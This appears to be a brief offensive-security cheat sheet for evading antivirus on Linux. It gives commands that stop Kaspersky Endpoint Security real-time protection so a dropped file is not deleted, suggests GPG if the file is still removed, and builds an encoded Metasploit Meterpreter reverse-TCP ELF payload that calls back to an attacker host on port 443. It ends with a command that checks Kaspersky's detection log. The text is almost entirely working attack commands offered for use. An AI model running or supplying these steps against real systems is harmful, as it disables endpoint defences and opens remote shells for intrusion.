Bypass AV Linux

kaspersky endpoint security

Turn off real time protection:

If we don't turn off, AV will delete our file instantly.

sudo kesl-control --stop-t 1

#start
sudo kesl-control --start-t 1

if still deleted, use GPG.

Metasploit payload

msfvenom -p linux/x64/meterpreter/reverse_tcp LPORT=443 LHOST=10.10.x.y -e x64/zutto_dekiru -f elf -o shell64zutto.elf

review event log of kaspersky:

sudo kesl-control -E --query |grep DetectName